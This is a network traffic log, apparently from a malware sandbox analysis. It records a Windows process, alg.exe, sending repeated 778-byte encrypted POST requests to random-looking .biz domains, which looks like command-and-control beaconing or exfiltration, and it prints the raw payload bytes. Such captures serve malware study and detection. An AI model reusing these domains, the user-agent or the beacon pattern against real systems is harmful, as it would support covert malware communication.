Oct 28, 2024 16:37:55.391195059 CET | 778 | OUT | Data Raw: eb 92 e9 f2 db 81 1d 8f fe 02 00 00 ee b8 38 63 cc c5 cd c2 ed 0f 05 f0 a1 1b d9 15 44 1e 0b c7 1b f1 9f 0a 51 35 3b f3 f4 b3 7d 16 2e 16 9b 32 2b 47 4f 55 5b 62 7a 5e 92 70 fb 89 38 cc ff e0 73 03 14 8d 54 a9 2c 8a f3 5a 4f f3 f9 de b0 6a 1e e1
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 8cDQ5;}.2+GOU[bz^p8sT,ZOjK\;]uHjVw;U4~x[eUgt.Z]]%<!v&1-=Uo'.A2F,,qE*qRE]etD
Oct 28, 2024 16:37:56.247502089 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5fed0a207cdd008f8bcb1cb0f0b88ce4|155.94.241.188|1730129876|1730129876|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49771 | 18.141.10.107 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:56.448688030 CET | 353 | OUT | POST /pyamvnfeng HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:56.448709965 CET | 778 | OUT | Data Raw: 5d 80 6f 0e a1 86 27 c5 fe 02 00 00 e8 47 b2 94 5f 6b fc 26 a2 60 0e 7d 12 a2 0e 76 1d cd da cc ee 74 22 c3 94 31 64 f0 07 dc 55 e3 2d 9a 1a ec 8f d3 02 15 7a c8 b7 cf 87 05 27 88 53 b7 d6 21 8b 99 7c f2 b1 ea f7 ae 85 92 b5 e7 f4 69 bf 28 37 ca
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]o'G_k&`}vt"1dU-z'S!|i(7%rQW@9fVI@`hi+1|#EL|5R-o;5;XD7OZi)vc#VHV,}2M}Y7~G+{g~hv-Sf.
Oct 28, 2024 16:37:57.995876074 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=94b1bc99141302e5423eb570df2323f0|155.94.241.188|1730129877|1730129877|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49772 | 18.208.156.248 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:58.293490887 CET | 349 | OUT | POST /txmgarlp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293512106 CET778OUTData Raw: 94 95 e5 e6 44 7b 8e 1f fe 02 00 00 f5 c9 8b 43 da 4d 06 a8 85 69 00 7c 28 fc 49 37 fd 66 73 1f 58 a4 3b ae 3a ce bf 9c 3a 3e 04 b9 d7 3d c8 f6 9e fe 72 62 65 3f d2 45 26 33 84 97 e0 1d f8 85 95 76 65 8d 42 ed a1 4a dc 63 02 94 fd 68 a1 93 2f 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: D{CMi|(I7fsX;::>=rbe?E&3veBJch/a}@O~~Il^,evA1e%h>EJ7W]Vh?^pwS)+h0s"/g2Y08\>rR`tIrpy!+ktA|oQ;
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.948283911 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c82b461f42a90aaea15b6e9c5f9501de|155.94.241.188|1730129878|1730129878|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49774 | 44.221.84.105 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:59.168756008 CET | 356 | OUT | POST /vbtgsklxqvsc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:59.168903112 CET | 778 | OUT | Data Raw: 09 b4 71 6c 99 a7 f1 24 fe 02 00 00 1b e6 03 9c 4a 2b 5a 28 90 4c 24 e1 ab 9a 67 f5 e0 3c a4 86 da bb fc 10 33 0d 6d 0e 4c af 2e 7e 19 02 dc ab ed 48 d7 0f 52 77 35 de 9e 63 14 e8 08 41 87 8c c8 26 01 01 4d 81 56 43 48 f0 2b 54 33 42 2f e2 48 06
Data Ascii: ql$J+Z(L$g<3mL.~HRw5cA&MVCH+T3B/HKDJtt8s^{){>V3j*P*E(ad,|JxKQ/7b!rkMb6qx_Z uS*B3DZ]MD#U-`|/(%-"-F
Oct 28, 2024 16:37:59.839534998 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:37:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d4950c314619ea9566fdd489b1c6b567|155.94.241.188|1730129879|1730129879|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49776 | 18.141.10.107 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:00.192723036 CET | 345 | OUT | POST /i HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:00.192749977 CET | 778 | OUT | Data Raw: 46 dc 74 92 b6 40 74 4e fe 02 00 00 c2 2e 53 50 79 bc 88 e9 86 c5 53 0b 90 39 60 6b 1c c9 d3 37 93 21 fa d4 1a 15 42 a2 e9 07 6b be 3c f6 89 8e 7d 24 d6 d0 e4 37 1f 74 2a 0d 45 60 f8 5d af 5e c4 87 7f 12 4e 9a 84 53 4f 6c 56 e3 f6 cc 89 12 3b fb
Data Ascii: Ft@tN.SPyS9`k7!Bk<}$7t*E`]^NSOlV;p+M.f`#X$^|[G(gFWWG!9$5.ldui^pVPfK]!X7^9eU`KL*Vp0Nh;wy<>u]kk'k.OR;
Oct 28, 2024 16:38:01.661093950 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7ab49bacca005f079c416fac475c4be1|155.94.241.188|1730129881|1730129881|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49787 | 18.246.231.120 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:01.879339933 CET | 356 | OUT | POST /ckhsjhaxaevpxtd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:01.879339933 CET | 778 | OUT | Data Raw: 17 95 ea ec 95 84 26 5f fe 02 00 00 4d 0e 12 b7 7a 65 0f 8e 0a 5b f7 61 99 90 f8 4a 34 39 27 64 eb 7a 94 b6 a1 d5 02 af c4 f9 59 82 27 ed c0 83 70 d5 74 0d c3 5f c4 77 b1 d9 5c bd 2d 5a 5e 8d ba 1b cb 39 e0 9c 20 89 e1 bf 68 c3 25 e6 76 84 bc 5c
Data Ascii: &_Mze[aJ49'dzY'pt_w\-Z^9 h%v\g69-_TL%t^v6*-=N9d&)vzo7h1Jw5h3%ojUVWLY!&wEkFifR<_Ie]
Oct 28, 2024 16:38:02.700972080 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4bceac6fe08da8ef539904a3985c7128|155.94.241.188|1730129882|1730129882|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49797 | 18.208.156.248 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:03.009713888 CET | 350 | OUT | POST /kjptih HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:03.009752035 CET | 778 | OUT | Data Raw: ed fc ab bc 1b 77 69 34 fe 02 00 00 0f e0 10 ca 16 1a 19 99 6c 90 d2 aa 14 a0 fc 02 13 0b 0b 39 83 6a 25 33 30 5c c9 77 ce 0c 33 4d 41 bf 04 bd 88 76 2b 1b ba c6 50 36 c1 b0 0e 5e 43 37 db ca 3b 9d de 36 d1 44 83 a3 cd 3c 2c a5 80 56 b1 48 6b f9
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: wi4l9j%30\w3MAv+P6^C7;6D<,VHk*l?IYQQ!QC5;%~qE/p!~wj0W+[,/S=a @(+G?^0|c@d7y4oVoO/grVimcIm
Oct 28, 2024 16:38:03.682817936 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3b26d27946529c6e9f54a8feff6e627b|155.94.241.188|1730129883|1730129883|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49803 | 13.251.16.150 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:03.926799059 CET | 352 | OUT | POST /ttxmcyeqta HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:03.926824093 CET | 778 | OUT | Data Raw: c7 ab 74 2d 78 23 b3 c0 fe 02 00 00 ad b6 3a 99 3c 84 18 08 60 34 91 ae 18 4c 98 4e e2 c4 82 38 6a 16 43 b9 9b 50 0d 22 bb 32 1e 7d fa 1c 4e 24 ec 4d 61 f2 0f 61 76 be 7c 47 03 cb 39 b4 5e fe 22 5f bb 52 ef bf 3b d4 78 aa c7 ce d6 2e e0 8e 9a bb
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t-x#:<`4LN8jCP"2}N$Maav|G9^"_R;x.1za{J_}<rbI%fKcpU}H/Aeoh>!.5)1MDm|G/2?+y\__na?nrni\k|w0^6.FsU#XRpb+xRQQe
Oct 28, 2024 16:38:05.384819984 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=666ca44c663d0e49436606dff1c4b709|155.94.241.188|1730129885|1730129885|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49811 | 13.251.16.150 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:05.593991995 CET | 360 | OUT | POST /xndhuecwgokoeqk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:05.594240904 CET | 778 | OUT | Data Raw: 1b 33 d2 b2 88 97 e5 fc fe 02 00 00 7e 10 8d de f8 f3 5c 0b 97 41 39 81 c3 af 99 92 36 3d 34 ba 7b de 36 fb 96 99 31 71 4c ce c3 6b 0b 98 4d 98 27 bb 53 a2 ad af b8 37 93 5d be c2 22 db b8 f3 5c 3f f5 cb 94 67 da 24 f8 d2 9e c7 68 83 20 a2 4d bf
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3~\A96=4{61qLkM'S7]"\?g$h Mr>wMV+aT5r31B%oe}-<rd($FLzS0S^#sqsc&I_9!3oVO>VV(]lzs~dbh
Oct 28, 2024 16:38:07.029905081 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:06 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2a3edbca467e30f9691b0318876334ac|155.94.241.188|1730129886|1730129886|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
43          192.168.2.4  49824        34.211.97.45    80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:07.498008013 CET  354                OUT        POST /yyjnpedbcl HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vrrazpdh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 28, 2024 16:38:07.498025894 CET  778                OUT        Data Raw: ff 43 1b 54 58 71 2a a6 fe 02 00 00 85 c0 c5 aa 63 75 4e ce 67 4d 1c 07 83 9b 2b ab 78 9a 5d d9 cc c1 d6 ea 77 e6 96 eb 82 1b 58 83 c8 e1 a9 d6 c8 0e c0 7f d7 c4 3c f3 59 77 b1 01 2a d8 1a 5b 6b b6 5f 7f 20 26 e3 a8 33 82 24 59 b4 1c 51 17 e7 dc
    Data Ascii: CTXq*cuNgM+x]wX<Yw*[k_ &3$YQd3gL]?$L*5'4:5CL<FVWi5m.%pL|.oJ8[@)*m};Ir1Zf4MWGQNpxv^oT;#,7
Oct 28, 2024 16:38:08.320926905 CET  416                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 28 Oct 2024 15:38:08 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=ae6700dcfefe50ac2a315128da9f9b84|155.94.241.188|1730129888|1730129888|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
44          192.168.2.4  49830        47.129.31.212   80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:08.893642902 CET  356                OUT        POST /jkvhfxewyayfhg HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ftxlah.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 28, 2024 16:38:08.893660069 CET  778                OUT        Data Raw: 09 24 1f 78 fd 6d 16 61 fe 02 00 00 d8 72 43 19 2e 67 fe 9c cc 8e 60 fc 2b a4 05 b6 87 5b 50 4c 46 46 12 d7 ac c8 34 0b 93 21 ab 69 0c 51 9d 8e 29 0b 55 b5 67 65 d1 98 bf 07 c2 d4 d6 62 3c 18 b2 79 82 ca f8 c4 7d 0e c2 46 ff 84 0c 0e 75 d5 38 68
    Data Ascii: $xmarC.g`+[PLFF4!iQ)Ugeb<y}Fu8h:m~:"usW(8k=T[4(zp$v&2DBQz!:}BT<xhYdv0W}t"7ty:*=r3jB2iavFIxz|f_H
Oct 28, 2024 16:38:10.346488953 CET  414                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 28 Oct 2024 15:38:10 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=c3c54d14b21f97d23ddf0806bb939a59|155.94.241.188|1730129890|1730129890|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
45          192.168.2.4  49839        13.251.16.150   80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:10.754662037 CET  356                OUT        POST /sxtbjbwlxwcwo HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: typgfhb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 28, 2024 16:38:10.754662037 CET  778                OUT        Data Raw: 0b 73 13 5c f7 f6 f5 b0 fe 02 00 00 70 7e 2e d6 70 ae 06 c9 1e 21 48 51 34 86 9c 29 cc 90 e4 cc 4e 71 e7 91 a6 3b d6 53 ad 83 62 a8 06 2d f2 c3 88 f1 09 22 de 18 ab e5 ad f7 06 98 8c 41 f0 c8 0b ad 4b bd 15 54 f7 27 b9 48 e1 d3 03 8d 26 b2 b6 39
    Data Ascii: s\p~.p!HQ4)Nq;Sb-"AKT'H&9$g~TI1ukYx$hSK,"'kNN2TUPtC?FC3*@q!DieA!o:s5z>G,)B(lpP=yx
Oct 28, 2024 16:38:12.195576906 CET  415                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 28 Oct 2024 15:38:11 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=d3afd1246eff468c68274730cccf2278|155.94.241.188|1730129891|1730129891|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.4  49850        34.211.97.45    80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:12.594521999 CET  351                OUT        POST /fvsaltcygk HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: esuzf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594521999 CET778OUTData Raw: d9 fb 84 4a 47 14 4e f2 fe 02 00 00 65 7f 4a 13 5b b9 a1 bc a2 0a 0c f7 c8 5e 87 8f d1 8a 15 9c 12 9a 77 3e c7 b8 6c a1 f3 b0 53 72 41 c2 a7 ba 35 29 55 21 5e f1 63 24 71 f4 ce a7 95 74 48 fb b4 db 16 96 b8 35 9a c1 11 bf f4 bd 8f f3 9a e8 35 d3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: JGNeJ[^w>lSrA5)U!^c$qtH55W%{_"hl~$JH:E k;c`/1s-AhFIuBrcXAjMF/%/4Pro} rJ<Uqn/wLj@??&xT
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.437880993 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fc57c6575ad8c553113a538687f61070|155.94.241.188|1730129893|1730129893|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
